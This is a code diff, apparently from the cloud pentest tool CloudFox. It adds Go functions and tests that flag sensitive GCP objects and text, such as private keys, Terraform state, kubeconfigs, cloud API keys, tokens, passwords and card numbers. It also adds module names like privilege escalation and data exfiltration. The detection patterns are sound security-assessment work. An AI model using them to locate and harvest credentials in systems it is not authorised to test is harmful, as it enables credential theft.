{Pattern: ".dockercfg", Category: "Config", RiskLevel: "HIGH", Description: "Docker registry credentials"}, + {Pattern: "docker-compose", Category: "Config", RiskLevel: "MEDIUM", Description: "Docker compose config"}, + {Pattern: "terraform.tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state (contains secrets)"}, + {Pattern: ".tfstate", Category: "Config", RiskLevel: "CRITICAL", Description: "Terraform state file"}, + {Pattern: "terraform.tfvars", Category: "Config", RiskLevel: "HIGH", Description: "Terraform variables"}, + {Pattern: "kubeconfig", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + {Pattern: ".kube/config", Category: "Config", RiskLevel: "CRITICAL", Description: "Kubernetes config"}, + + // Backups - HIGH + {Pattern: ".sql", Category: "Backup", RiskLevel: "HIGH", Description: "SQL database dump"}, + {Pattern: ".dump", Category: "Backup", RiskLevel: "HIGH", Description: "Database dump"}, + {Pattern: ".bak", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file"}, + {Pattern: "backup", Category: "Backup", RiskLevel: "MEDIUM", Description: "Backup file/directory"}, + {Pattern: ".tar.gz", Category: "Backup", RiskLevel: "MEDIUM", Description: "Compressed archive"}, + {Pattern: ".zip", Category: "Backup", RiskLevel: "MEDIUM", Description: "ZIP archive"}, + + // Source code - MEDIUM + {Pattern: ".git", Category: "Source", RiskLevel: "MEDIUM", Description: "Git repository data"}, + {Pattern: "source", Category: "Source", RiskLevel: "LOW", Description: "Source code"}, + + // Logs - LOW (but may contain sensitive data) + {Pattern: ".log", Category: "Log", RiskLevel: "LOW", Description: "Log file (may contain sensitive data)"}, + {Pattern: "access.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Access log"}, + {Pattern: "error.log", Category: "Log", RiskLevel: "MEDIUM", Description: "Error log"}, + + // Cloud-specific + {Pattern: "cloudfunctions", Category: "Cloud", RiskLevel: 
"MEDIUM", Description: "Cloud Functions source"}, + {Pattern: "gcf-sources", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Functions source bucket"}, + {Pattern: "cloud-build", Category: "Cloud", RiskLevel: "MEDIUM", Description: "Cloud Build artifacts"}, + {Pattern: "artifacts", Category: "Cloud", RiskLevel: "LOW", Description: "Build artifacts"}, + } +} + +// contentPatterns is the compiled list, initialized once. +var contentPatterns []ContentPattern + +func init() { + contentPatterns = compileContentPatterns() +} + +func compileContentPatterns() []ContentPattern { + defs := []struct { + pattern string + category string + riskLevel string + description string + }{ + // Credentials - CRITICAL + {`"type"\s*:\s*"service_account"`, "Credential", "CRITICAL", "GCP service account key JSON"}, + {`-----BEGIN\s*(RSA|EC|DSA|OPENSSH)?\s*PRIVATE KEY-----`, "Credential", "CRITICAL", "Private key"}, + {`AKIA[0-9A-Z]{16}`, "Credential", "CRITICAL", "AWS access key"}, + {`AIza[0-9A-Za-z_\-]{35}`, "Credential", "CRITICAL", "GCP API key"}, + + // Secrets - HIGH + {`(?i)(password|passwd|pwd)\s*[:=]\s*\S+`, "Secret", "HIGH", "Password assignment"}, + {`(?i)bearer\s+[a-zA-Z0-9_\-\.]+`, "Secret", "HIGH", "Bearer token"}, + {`(?i)(jdbc|mongodb|mysql|postgres|redis)://[^\s]+`, "Secret", "HIGH", "Connection string"}, + + // Tokens - HIGH + {`eyJ[a-zA-Z0-9_-]*\.eyJ[a-zA-Z0-9_-]*\.[a-zA-Z0-9_-]*`, "Token", "HIGH", "JWT token"}, + {`ya29\.[0-9A-Za-z_-]+`, "Token", "HIGH", "GCP OAuth token"}, + {`gh[ps]_[A-Za-z0-9_]{36,}`, "Token", "HIGH", "GitHub token"}, + + // PII - MEDIUM + {`\b(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|3[47][0-9]{13})\b`, "PII", "MEDIUM", "Credit card number"}, + {`\b\d{3}-\d{2}-\d{4}\b`, "PII", "MEDIUM", "SSN pattern"}, + } + + patterns := make([]ContentPattern, 0, len(defs)) + for _, d := range defs { + compiled := regexp.MustCompile(d.pattern) + patterns = append(patterns, ContentPattern{ + Regex: compiled, + Category: d.category, + RiskLevel: 
d.riskLevel, + Description: d.description, + }) + } + return patterns +} + +// GetContentPatterns returns regex-based patterns for matching inside text content +// (log entries, query results, etc.). +func GetContentPatterns() []ContentPattern { + return contentPatterns +} + +// GetNamePatterns returns patterns for detecting sensitive resource names +// (table names, column names, dataset names). +func GetNamePatterns() []SensitivePattern { + return []SensitivePattern{ + // Credentials/keys + {Pattern: "password", Category: "Credential", RiskLevel: "HIGH", Description: "Password-related resource"}, + {Pattern: "passwd", Category: "Credential", RiskLevel: "HIGH", Description: "Password-related resource"}, + {Pattern: "secret", Category: "Credential", RiskLevel: "HIGH", Description: "Secret-related resource"}, + {Pattern: "credential", Category: "Credential", RiskLevel: "HIGH", Description: "Credential-related resource"}, + {Pattern: "token", Category: "Credential", RiskLevel: "HIGH", Description: "Token-related resource"}, + {Pattern: "auth", Category: "Credential", RiskLevel: "MEDIUM", Description: "Authentication-related resource"}, + {Pattern: "private_key", Category: "Credential", RiskLevel: "CRITICAL", Description: "Private key resource"}, + {Pattern: "api_key", Category: "Credential", RiskLevel: "HIGH", Description: "API key resource"}, + {Pattern: "access_key", Category: "Credential", RiskLevel: "HIGH", Description: "Access key resource"}, + {Pattern: "encryption_key", Category: "Credential", RiskLevel: "HIGH", Description: "Encryption key resource"}, + + // PII + {Pattern: "ssn", Category: "PII", RiskLevel: "HIGH", Description: "SSN-related resource"}, + {Pattern: "social_security", Category: "PII", RiskLevel: "HIGH", Description: "Social security resource"}, + {Pattern: "credit_card", Category: "PII", RiskLevel: "HIGH", Description: "Credit card resource"}, + {Pattern: "cc_number", Category: "PII", RiskLevel: "HIGH", Description: "Credit card number 
resource"}, + {Pattern: "cvv", Category: "PII", RiskLevel: "HIGH", Description: "CVV resource"}, + + // Compliance + {Pattern: "pii", Category: "Compliance", RiskLevel: "HIGH", Description: "PII-labeled resource"}, + {Pattern: "phi", Category: "Compliance", RiskLevel: "HIGH", Description: "PHI-labeled resource"}, + {Pattern: "hipaa", Category: "Compliance", RiskLevel: "HIGH", Description: "HIPAA-labeled resource"}, + {Pattern: "gdpr", Category: "Compliance", RiskLevel: "HIGH", Description: "GDPR-labeled resource"}, + {Pattern: "sensitive", Category: "Compliance", RiskLevel: "MEDIUM", Description: "Sensitive-labeled resource"}, + + // Financial + {Pattern: "payment", Category: "Financial", RiskLevel: "HIGH", Description: "Payment-related resource"}, + {Pattern: "billing", Category: "Financial", RiskLevel: "MEDIUM", Description: "Billing-related resource"}, + {Pattern: "financial", Category: "Financial", RiskLevel: "HIGH", Description: "Financial resource"}, + {Pattern: "salary", Category: "Financial", RiskLevel: "HIGH", Description: "Salary-related resource"}, + {Pattern: "bank", Category: "Financial", RiskLevel: "HIGH", Description: "Banking-related resource"}, + + // General sensitive data + {Pattern: "user_data", Category: "Data", RiskLevel: "MEDIUM", Description: "User data resource"}, + {Pattern: "customer_data", Category: "Data", RiskLevel: "MEDIUM", Description: "Customer data resource"}, + {Pattern: "personal", Category: "Data", RiskLevel: "MEDIUM", Description: "Personal data resource"}, + {Pattern: "confidential", Category: "Data", RiskLevel: "HIGH", Description: "Confidential resource"}, + } +} + +// MatchFileName checks an object/file name against file patterns. +// Returns the first match, or nil if no match. 
+func MatchFileName(objectName string, patterns []SensitivePattern) *SensitiveMatch { + name := strings.ToLower(objectName) + ext := strings.ToLower(fileExt(objectName)) + baseName := strings.ToLower(fileBase(objectName)) + + for _, pattern := range patterns { + matched := false + patternLower := strings.ToLower(pattern.Pattern) + + // Check extension match + if strings.HasPrefix(patternLower, ".") && ext == patternLower { + matched = true + } + // Check name contains pattern + if strings.Contains(name, patternLower) { + matched = true + } + // Check base name match + if strings.Contains(baseName, patternLower) { + matched = true + } + + if matched { + if IsFilePathFalsePositive(objectName, pattern) { + continue + } + return &SensitiveMatch{ + Pattern: pattern.Pattern, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: objectName, + } + } + } + return nil +} + +// MatchContent checks text content against content patterns. +// Returns all matches found. +func MatchContent(text string, patterns []ContentPattern) []ContentMatch { + var matches []ContentMatch + for _, pattern := range patterns { + locs := pattern.Regex.FindAllStringIndex(text, -1) + for _, loc := range locs { + matchedText := text[loc[0]:loc[1]] + snippet := extractSnippet(text, loc[0], loc[1], 50) + matches = append(matches, ContentMatch{ + Pattern: pattern.Regex.String(), + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: matchedText, + Snippet: snippet, + }) + } + } + return matches +} + +// MatchResourceName checks a resource name (table, column, dataset) against name patterns. +// Uses case-insensitive substring matching. Returns the first match, or nil. 
+func MatchResourceName(name string, patterns []SensitivePattern) *SensitiveMatch { + nameLower := strings.ToLower(name) + for _, pattern := range patterns { + patternLower := strings.ToLower(pattern.Pattern) + if strings.Contains(nameLower, patternLower) { + return &SensitiveMatch{ + Pattern: pattern.Pattern, + Category: pattern.Category, + RiskLevel: pattern.RiskLevel, + Description: pattern.Description, + MatchedText: name, + } + } + } + return nil +} + +// IsFilePathFalsePositive checks if a file path match is a common false positive. +func IsFilePathFalsePositive(path string, pattern SensitivePattern) bool { + nameLower := strings.ToLower(path) + + // Filter out common false positive paths + falsePositivePaths := []string{ + "node_modules/", + "vendor/", + ".git/objects/", + "__pycache__/", + "dist/", + "build/", + } + + for _, fp := range falsePositivePaths { + if strings.Contains(nameLower, fp) { + return true + } + } + + // JSON files that are likely not credentials + if pattern.Pattern == ".json" { + if !strings.Contains(nameLower, "service") && + !strings.Contains(nameLower, "account") && + !strings.Contains(nameLower, "credential") && + !strings.Contains(nameLower, "key") && + !strings.Contains(nameLower, "secret") && + !strings.Contains(nameLower, "auth") { + return true + } + } + + return false +} + +// extractSnippet returns surrounding context around a match. +func extractSnippet(text string, start, end, contextLen int) string { + snippetStart := start - contextLen + if snippetStart < 0 { + snippetStart = 0 + } + snippetEnd := end + contextLen + if snippetEnd > len(text) { + snippetEnd = len(text) + } + snippet := text[snippetStart:snippetEnd] + // Replace newlines with spaces for cleaner output + snippet = strings.ReplaceAll(snippet, "\n", " ") + snippet = strings.ReplaceAll(snippet, "\r", "") + return snippet +} + +// fileExt returns the file extension (e.g., ".json"). 
+func fileExt(name string) string { + for i := len(name) - 1; i >= 0; i-- { + if name[i] == '.' { + return name[i:] + } + if name[i] == '/' { + return "" + } + } + return "" +} + +// fileBase returns the last component of a path. +func fileBase(name string) string { + for i := len(name) - 1; i >= 0; i-- { + if name[i] == '/' { + return name[i+1:] + } + } + return name +} diff --git a/gcp/shared/sensitive_test.go b/gcp/shared/sensitive_test.go new file mode 100644 index 00000000..4388fdf4 --- /dev/null +++ b/gcp/shared/sensitive_test.go @@ -0,0 +1,191 @@ +package shared + +import ( + "testing" +) + +func TestMatchFileName_Credential(t *testing.T) { + patterns := GetFilePatterns() + + tests := []struct { + name string + input string + wantNil bool + category string + }{ + {"service account key", "my-project-sa-key.json", false, "Credential"}, + {"pem file", "certs/server.pem", false, "Credential"}, + {"ssh key", "home/.ssh/id_rsa", false, "Credential"}, + {"p12 file", "keys/cert.p12", false, "Credential"}, + {"random txt", "readme.txt", true, ""}, + {"random png", "image.png", true, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := MatchFileName(tt.input, patterns) + if tt.wantNil && result != nil { + t.Errorf("expected nil match for %q, got %+v", tt.input, result) + } + if !tt.wantNil && result == nil { + t.Errorf("expected match for %q, got nil", tt.input) + } + if !tt.wantNil && result != nil && result.Category != tt.category { + t.Errorf("expected category %q for %q, got %q", tt.category, tt.input, result.Category) + } + }) + } +} + +func TestMatchFileName_FalsePositives(t *testing.T) { + patterns := GetFilePatterns() + + // These should be filtered as false positives + fps := []string{ + "node_modules/package.json", + "vendor/lib/config.yaml", + ".git/objects/abc123", + "__pycache__/module.key", + "dist/bundle.env", + } + + for _, fp := range fps { + result := MatchFileName(fp, patterns) + if result != nil { + 
t.Errorf("expected false positive for %q, got %+v", fp, result) + } + } +} + +func TestMatchFileName_JSONFiltering(t *testing.T) { + patterns := GetFilePatterns() + + // Plain .json should be filtered unless it contains credential keywords + result := MatchFileName("data/report.json", patterns) + if result != nil { + t.Errorf("expected nil for non-credential json, got %+v", result) + } + + // Credential-related .json should match + result = MatchFileName("data/service-account-key.json", patterns) + if result == nil { + t.Errorf("expected match for service account json, got nil") + } +} + +func TestMatchContent(t *testing.T) { + patterns := GetContentPatterns() + + tests := []struct { + name string + input string + wantCount int + category string + }{ + { + "GCP SA key", + `{"type": "service_account", "project_id": "test"}`, + 1, "Credential", + }, + { + "private key", + `-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAK...`, + 1, "Credential", + }, + { + "AWS key", + `access_key = AKIAIOSFODNN7EXAMPLE`, + 1, "Credential", + }, + { + "JWT", + `token=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.abc_def-ghi`, + 1, "Token", + }, + { + "password assignment", + `db_password=SuperSecret123`, + 1, "Secret", + }, + { + "connection string", + `url=postgres://user:pass@host:5432/db`, + 1, "Secret", + }, + { + "no match", + `This is a normal log entry with no sensitive data.`, + 0, "", + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + matches := MatchContent(tt.input, patterns) + if len(matches) != tt.wantCount { + t.Errorf("expected %d matches for %q, got %d: %+v", tt.wantCount, tt.name, len(matches), matches) + } + if tt.wantCount > 0 && len(matches) > 0 && matches[0].Category != tt.category { + t.Errorf("expected category %q, got %q", tt.category, matches[0].Category) + } + }) + } +} + +func TestMatchResourceName(t *testing.T) { + patterns := GetNamePatterns() + + tests := []struct { + name string + input string + wantNil bool + category string 
+ }{ + {"password column", "user_password", false, "Credential"}, + {"secret table", "app_secrets", false, "Credential"}, + {"ssn column", "customer_ssn", false, "PII"}, + {"credit card", "credit_card_numbers", false, "PII"}, + {"pii dataset", "raw_pii_data", false, "Compliance"}, + {"payment table", "payment_transactions", false, "Financial"}, + {"normal table", "products", true, ""}, + {"normal column", "created_at", true, ""}, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + result := MatchResourceName(tt.input, patterns) + if tt.wantNil && result != nil { + t.Errorf("expected nil for %q, got %+v", tt.input, result) + } + if !tt.wantNil && result == nil { + t.Errorf("expected match for %q, got nil", tt.input) + } + if !tt.wantNil && result != nil && result.Category != tt.category { + t.Errorf("expected category %q for %q, got %q", tt.category, tt.input, result.Category) + } + }) + } +} + +func TestIsFilePathFalsePositive(t *testing.T) { + p := SensitivePattern{Pattern: ".key", Category: "Credential", RiskLevel: "CRITICAL"} + + if !IsFilePathFalsePositive("node_modules/crypto/test.key", p) { + t.Error("expected node_modules to be false positive") + } + if IsFilePathFalsePositive("secrets/server.key", p) { + t.Error("expected secrets/server.key to not be false positive") + } +} + +func TestExtractSnippet(t *testing.T) { + text := "prefix some password=Secret123 suffix text" + snippet := extractSnippet(text, 12, 29, 10) + if len(snippet) == 0 { + t.Error("expected non-empty snippet") + } + // Snippet should contain the match and some context + if len(snippet) > len(text) { + t.Error("snippet should not exceed original text length") + } +} diff --git a/globals/gcp.go b/globals/gcp.go index 1ec42f68..1b6bb53b 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -1,15 +1,90 @@ package globals // Module names -// const GCP_WHOAMI_MODULE_NAME = "whoami" const GCP_ARTIFACT_RESGISTRY_MODULE_NAME string = "artifact-registry" const 
GCP_BIGQUERY_MODULE_NAME string = "bigquery" -const GCP_BUCKETS_MODULE_NAME string = "buckets" +const GCP_STORAGE_MODULE_NAME string = "storage" const GCP_INSTANCES_MODULE_NAME string = "instances" const GCP_IAM_MODULE_NAME string = "iam" +const GCP_PERMISSIONS_MODULE_NAME string = "permissions" const GCP_SECRETS_MODULE_NAME string = "secrets" const GCP_WHOAMI_MODULE_NAME string = "whoami" +// New module names +const GCP_FUNCTIONS_MODULE_NAME string = "functions" +const GCP_CLOUDRUN_MODULE_NAME string = "cloudrun" +const GCP_CLOUDSQL_MODULE_NAME string = "cloudsql" +const GCP_GKE_MODULE_NAME string = "gke" +const GCP_PUBSUB_MODULE_NAME string = "pubsub" +const GCP_KMS_MODULE_NAME string = "kms" +const GCP_SERVICEACCOUNTS_MODULE_NAME string = "serviceaccounts" +const GCP_LOGGING_MODULE_NAME string = "logging" +const GCP_NETWORKS_MODULE_NAME string = "networks" +const GCP_FIREWALL_MODULE_NAME string = "firewall" +const GCP_DNS_MODULE_NAME string = "dns" +const GCP_SCHEDULER_MODULE_NAME string = "scheduler" +const GCP_ORGANIZATIONS_MODULE_NAME string = "organizations" +const GCP_APIKEYS_MODULE_NAME string = "apikeys" +const GCP_EXPOSURE_MODULE_NAME string = "exposure" +const GCP_CLOUDBUILD_MODULE_NAME string = "cloudbuild" +const GCP_DATAFLOW_MODULE_NAME string = "dataflow" +const GCP_COMPOSER_MODULE_NAME string = "composer" +const GCP_MEMORYSTORE_MODULE_NAME string = "memorystore" +const GCP_FILESTORE_MODULE_NAME string = "filestore" +const GCP_SPANNER_MODULE_NAME string = "spanner" +const GCP_BIGTABLE_MODULE_NAME string = "bigtable" +const GCP_VPCSC_MODULE_NAME string = "vpc-sc" +const GCP_WORKLOAD_IDENTITY_MODULE_NAME string = "workload-identity" +const GCP_IDENTITY_FEDERATION_MODULE_NAME string = "identity-federation" +const GCP_ASSET_INVENTORY_MODULE_NAME string = "asset-inventory" +const GCP_LOADBALANCERS_MODULE_NAME string = "loadbalancers" +const GCP_VPCNETWORKS_MODULE_NAME string = "vpc-networks" +const GCP_NOTEBOOKS_MODULE_NAME string = "notebooks" +const 
GCP_DATAPROC_MODULE_NAME string = "dataproc" +const GCP_IAP_MODULE_NAME string = "iap" +const GCP_BEYONDCORP_MODULE_NAME string = "beyondcorp" +const GCP_ACCESSLEVELS_MODULE_NAME string = "access-levels" + +// Pentest modules +const GCP_HIDDEN_ADMINS_MODULE_NAME string = "hidden-admins" +const GCP_KEYS_MODULE_NAME string = "keys" +const GCP_HMACKEYS_MODULE_NAME string = "hmac-keys" +const GCP_PRIVESC_MODULE_NAME string = "privesc" +const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" +const GCP_STORAGEENUM_MODULE_NAME string = "storage-enum" +const GCP_LOGGINGENUM_MODULE_NAME string = "logging-enum" +const GCP_BIGQUERYENUM_MODULE_NAME string = "bigquery-enum" +const GCP_BIGTABLEENUM_MODULE_NAME string = "bigtable-enum" +const GCP_SPANNERENUM_MODULE_NAME string = "spanner-enum" +const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" +const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" +const GCP_PUBLICACCESS_MODULE_NAME string = "public-access" +const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" +const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" +const GCP_SERVICEAGENTS_MODULE_NAME string = "service-agents" +const GCP_DOMAINWIDEDELEGATION_MODULE_NAME string = "domain-wide-delegation" +const GCP_PRIVATESERVICECONNECT_MODULE_NAME string = "private-service-connect" +const GCP_CLOUDARMOR_MODULE_NAME string = "cloud-armor" +const GCP_CERTMANAGER_MODULE_NAME string = "cert-manager" + +// Resource IAM module +const GCP_RESOURCEIAM_MODULE_NAME string = "resource-iam" + +// New security analysis modules (Azure equivalents) +const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" +const GCP_LATERALMOVEMENT_MODULE_NAME string = "lateral-movement" +const GCP_DATAEXFILTRATION_MODULE_NAME string = "data-exfiltration" +const GCP_BACKUPINVENTORY_MODULE_NAME string = "backup-inventory" +const GCP_COMPLIANCEDASHBOARD_MODULE_NAME string = "compliance-dashboard" +const GCP_COSTSECURITY_MODULE_NAME string = "cost-security" +const 
GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +// Verbosity levels (matching Azure pattern) +var GCP_VERBOSITY int = 0 + +const GCP_VERBOSE_ERRORS = 9 + // const GCP_INVENTORY_MODULE_NAME string = "inventory" // const GCP_GCLOUD_REFRESH_TOKENS_DB_PATH = ".config/gcloud/credentials.db" // const GCP_GCLOUD_ACCESS_TOKENS_DB_PATH = ".config/gcloud/access_tokens.db" diff --git a/globals/utils.go b/globals/utils.go index cec516ae..ad1dabb0 100644 --- a/globals/utils.go +++ b/globals/utils.go @@ -4,4 +4,4 @@ const CLOUDFOX_USER_AGENT = "cloudfox" const CLOUDFOX_LOG_FILE_DIR_NAME = ".cloudfox" const CLOUDFOX_BASE_DIRECTORY = "cloudfox-output" const LOOT_DIRECTORY_NAME = "loot" -const CLOUDFOX_VERSION = "1.17.0" +const CLOUDFOX_VERSION = "2.0.0" diff --git a/go.mod b/go.mod index 7e1bec1b..dd9b1238 100644 --- a/go.mod +++ b/go.mod @@ -87,9 +87,12 @@ require ( require ( cel.dev/expr v0.25.1 // indirect + cloud.google.com/go/accesscontextmanager v1.9.7 // indirect cloud.google.com/go/auth v0.17.0 // indirect cloud.google.com/go/auth/oauth2adapt v0.2.8 // indirect - cloud.google.com/go/monitoring v1.24.3 // indirect + cloud.google.com/go/orgpolicy v1.15.1 // indirect + cloud.google.com/go/osconfig v1.15.1 // indirect + cloud.google.com/go/pubsub/v2 v2.0.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/exporter/metric v0.54.0 // indirect github.com/GoogleCloudPlatform/opentelemetry-operations-go/internal/resourcemapping v0.54.0 // indirect @@ -122,6 +125,7 @@ require ( github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/spiffe/go-spiffe/v2 v2.6.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect + go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect 
go.opentelemetry.io/contrib/detectors/gcp v1.39.0 // indirect go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc v0.64.0 // indirect @@ -137,6 +141,11 @@ require ( ) require ( + cloud.google.com/go/asset v1.22.0 + cloud.google.com/go/kms v1.23.2 + cloud.google.com/go/monitoring v1.24.3 + cloud.google.com/go/pubsub v1.50.1 + cloud.google.com/go/securitycenter v1.38.1 github.com/aws/aws-sdk-go-v2/service/kms v1.49.4 golang.org/x/oauth2 v0.34.0 google.golang.org/api v0.257.0 @@ -209,5 +218,5 @@ require ( golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto/googleapis/api v0.0.0-20251202230838-ff82c1b0f217 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20251202230838-ff82c1b0f217 // indirect - google.golang.org/grpc v1.77.0 // indirect + google.golang.org/grpc v1.77.0 ) diff --git a/go.sum b/go.sum index 6f23c6f7..699fb8a7 100644 --- a/go.sum +++ b/go.sum @@ -1,9 +1,14 @@ cel.dev/expr v0.25.1 h1:1KrZg61W6TWSxuNZ37Xy49ps13NUovb66QLprthtwi4= cel.dev/expr v0.25.1/go.mod h1:hrXvqGP6G6gyx8UAHSHJ5RGk//1Oj5nXQ2NI02Nrsg4= +cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go v0.123.0 h1:2NAUJwPR47q+E35uaJeYoNhuNEM9kM8SjgRgdeOJUSE= cloud.google.com/go v0.123.0/go.mod h1:xBoMV08QcqUGuPW65Qfm1o9Y4zKZBpGS+7bImXLTAZU= +cloud.google.com/go/accesscontextmanager v1.9.7 h1:aKIfg7Jyc73pe8bzx0zypNdS5gfFdSvFvB8YNA9k2kA= +cloud.google.com/go/accesscontextmanager v1.9.7/go.mod h1:i6e0nd5CPcrh7+YwGq4bKvju5YB9sgoAip+mXU73aMM= cloud.google.com/go/artifactregistry v1.18.0 h1:4qQIM1a1OymPxCODgLpXJo+097feE0i9pwpof98SimQ= cloud.google.com/go/artifactregistry v1.18.0/go.mod h1:UEAPCgHDFC1q+A8nnVxXHPEy9KCVOeavFBF1fEChQvU= +cloud.google.com/go/asset v1.22.0 h1:81Ru5hjHfiGtk+u/Ix69eaWieKpvm7Ce7UHtcZhOLbk= +cloud.google.com/go/asset v1.22.0/go.mod h1:q80JP2TeWWzMCazYnrAfDf36aQKf1QiKzzpNLflJwf8= cloud.google.com/go/auth v0.17.0 h1:74yCm7hCj2rUyyAocqnFzsAYXgJhrG26XCFimrc/Kz4= 
cloud.google.com/go/auth v0.17.0/go.mod h1:6wv/t5/6rOPAX4fJiRjKkJCvswLwdet7G8+UGXt7nCQ= cloud.google.com/go/auth/oauth2adapt v0.2.8 h1:keo8NaayQZ6wimpNSmW5OPc283g65QNIiLpZnkHRbnc= @@ -16,16 +21,28 @@ cloud.google.com/go/datacatalog v1.26.1 h1:bCRKA8uSQN8wGW3Tw0gwko4E9a64GRmbW1nCb cloud.google.com/go/datacatalog v1.26.1/go.mod h1:2Qcq8vsHNxMDgjgadRFmFG47Y+uuIVsyEGUrlrKEdrg= cloud.google.com/go/iam v1.5.3 h1:+vMINPiDF2ognBJ97ABAYYwRgsaqxPbQDlMnbHMjolc= cloud.google.com/go/iam v1.5.3/go.mod h1:MR3v9oLkZCTlaqljW6Eb2d3HGDGK5/bDv93jhfISFvU= +cloud.google.com/go/kms v1.23.2 h1:4IYDQL5hG4L+HzJBhzejUySoUOheh3Lk5YT4PCyyW6k= +cloud.google.com/go/kms v1.23.2/go.mod h1:rZ5kK0I7Kn9W4erhYVoIRPtpizjunlrfU4fUkumUp8g= cloud.google.com/go/logging v1.13.1 h1:O7LvmO0kGLaHY/gq8cV7T0dyp6zJhYAOtZPX4TF3QtY= cloud.google.com/go/logging v1.13.1/go.mod h1:XAQkfkMBxQRjQek96WLPNze7vsOmay9H5PqfsNYDqvw= cloud.google.com/go/longrunning v0.7.0 h1:FV0+SYF1RIj59gyoWDRi45GiYUMM3K1qO51qoboQT1E= cloud.google.com/go/longrunning v0.7.0/go.mod h1:ySn2yXmjbK9Ba0zsQqunhDkYi0+9rlXIwnoAf+h+TPY= cloud.google.com/go/monitoring v1.24.3 h1:dde+gMNc0UhPZD1Azu6at2e79bfdztVDS5lvhOdsgaE= cloud.google.com/go/monitoring v1.24.3/go.mod h1:nYP6W0tm3N9H/bOw8am7t62YTzZY+zUeQ+Bi6+2eonI= +cloud.google.com/go/orgpolicy v1.15.1 h1:0hq12wxNwcfUMojr5j3EjWECSInIuyYDhkAWXTomRhc= +cloud.google.com/go/orgpolicy v1.15.1/go.mod h1:bpvi9YIyU7wCW9WiXL/ZKT7pd2Ovegyr2xENIeRX5q0= +cloud.google.com/go/osconfig v1.15.1 h1:QQzK5njfsfO2rdOWYVDyLQktqSq9gKf2ohRYeKUuA10= +cloud.google.com/go/osconfig v1.15.1/go.mod h1:NegylQQl0+5m+I+4Ey/g3HGeQxKkncQ1q+Il4DZ8PME= +cloud.google.com/go/pubsub v1.50.1 h1:fzbXpPyJnSGvWXF1jabhQeXyxdbCIkXTpjXHy7xviBM= +cloud.google.com/go/pubsub v1.50.1/go.mod h1:6YVJv3MzWJUVdvQXG081sFvS0dWQOdnV+oTo++q/xFk= +cloud.google.com/go/pubsub/v2 v2.0.0 h1:0qS6mRJ41gD1lNmM/vdm6bR7DQu6coQcVwD+VPf0Bz0= +cloud.google.com/go/pubsub/v2 v2.0.0/go.mod h1:0aztFxNzVQIRSZ8vUr79uH2bS3jwLebwK6q1sgEub+E= cloud.google.com/go/resourcemanager 
v1.10.7 h1:oPZKIdjyVTuag+D4HF7HO0mnSqcqgjcuA18xblwA0V0= cloud.google.com/go/resourcemanager v1.10.7/go.mod h1:rScGkr6j2eFwxAjctvOP/8sqnEpDbQ9r5CKwKfomqjs= cloud.google.com/go/secretmanager v1.16.0 h1:19QT7ZsLJ8FSP1k+4esQvuCD7npMJml6hYzilxVyT+k= cloud.google.com/go/secretmanager v1.16.0/go.mod h1://C/e4I8D26SDTz1f3TQcddhcmiC3rMEl0S1Cakvs3Q= +cloud.google.com/go/securitycenter v1.38.1 h1:D9zpeguY4frQU35GBw8+M6Gw79CiuTF9iVs4sFm3FDY= +cloud.google.com/go/securitycenter v1.38.1/go.mod h1:Ge2D/SlG2lP1FrQD7wXHy8qyeloRenvKXeB4e7zO6z0= cloud.google.com/go/storage v1.58.0 h1:PflFXlmFJjG/nBeR9B7pKddLQWaFaRWx4uUi/LyNxxo= cloud.google.com/go/storage v1.58.0/go.mod h1:cMWbtM+anpC74gn6qjLh+exqYcfmB9Hqe5z6adx+CLI= cloud.google.com/go/trace v1.11.7 h1:kDNDX8JkaAG3R2nq1lIdkb7FCSi1rCmsEtKVsty7p+U= @@ -84,6 +101,7 @@ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1 h1:WJ github.com/AzureAD/microsoft-authentication-extensions-for-go/cache v0.1.1/go.mod h1:tCcJZ0uHAmvjsVYzEFivsRTN00oz5BEsRgQHu5JZ9WE= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0 h1:XRzhVemXdgvJqCH0sFfrBUTnUJSBrBf7++ypk+twtRs= github.com/AzureAD/microsoft-authentication-library-for-go v1.6.0/go.mod h1:HKpQxkWaGLJ+D/5H8QRpyQXA1eKjxkFlOMwck5+33Jk= +github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/GoogleCloudPlatform/opentelemetry-operations-go/detectors/gcp v1.30.0 